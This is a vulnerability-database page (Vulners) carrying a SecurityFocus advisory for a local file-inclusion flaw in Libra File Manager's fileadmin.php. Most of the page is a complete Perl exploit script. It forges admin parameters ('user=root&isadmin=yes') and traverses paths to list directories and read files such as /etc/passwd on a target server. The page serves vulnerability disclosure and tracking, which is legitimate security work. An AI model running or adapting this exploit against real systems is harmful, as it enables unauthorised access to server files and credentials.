Vulners
Lucene search
Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability
source: http://www.securityfocus.com/bid/31403/info
Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Libra File Manager 2.0 and prior versions are available.
#! /usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Program: Libra PHP File Manager
# Version: <= 1.18
# File affected: fileadmin.php
# Download: http://file.sourceforge.net
#
#
# Found by Pepelux <pepelux[at]enye-sec.org>
# eNYe-Sec - www.enye-sec.org
# Greetings to Ka0x for help me with the perl code :)
#
# You can scale directories and read any file that you have permissions
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
print "\e[2J";
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
my ($host, $path, $action) = @ARGV ;
unless($ARGV[2]) {
print "Usage: perl $0 <host> <path> <action>\n";
print "\tex: perl $0 http://www.example.com /etc/ list\n";
print "\tex: perl $0 http://www.example.com /etc/passwd edit\n";
print "Actions:\n";
print " list:\n";
print " edit:\n\n";
exit 1;
}
$ua->agent("$0/0.1 " . $ua->agent);
$host = "http://".$host if ($host !~ /^http:/);
$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
$op = "home" if ($action == "list");
if ($action eq "edit") {
$aux = $path;
$directory = "";
do {
$x = index($aux, "/");
$y = length($aux) - $x;
$directory .= substr($aux, 0, $x+1);
$aux = substr($aux, $x+1, $y);
} until ($x == -1);
$path = $directory;
$file = $aux;
$op = "edit";
}
$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
$url .= "&fename=".$file if ($action eq "edit");
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
$result = $res->content;
if ($action eq "edit") {
print "Viewing $path$file:\n";
print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
}
else {
print "Files in $path:\n";
$x = index($result, "Files:") + 6;
$result = substr($result, $x, length($result)-$x);
$result =~ s/<[^>]*>//g;
$result =~ s/Filename//g;
$result =~ s/Size//g;
$result =~ s/Edit//g;
$result =~ s/Rename//g;
$result =~ s/Delete//g;
$result =~ s/Move//g;
$result =~ s/View//g;
$result =~ s/Open//g;
$result =~ s/\d*//g;
$result =~ s/\s+/\n/g;
$x = index($result, "Copyright");
$result = substr($result, 0, $x);
print $result;
}
}
else { print "Error: " . $res->status_line . "\n";}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1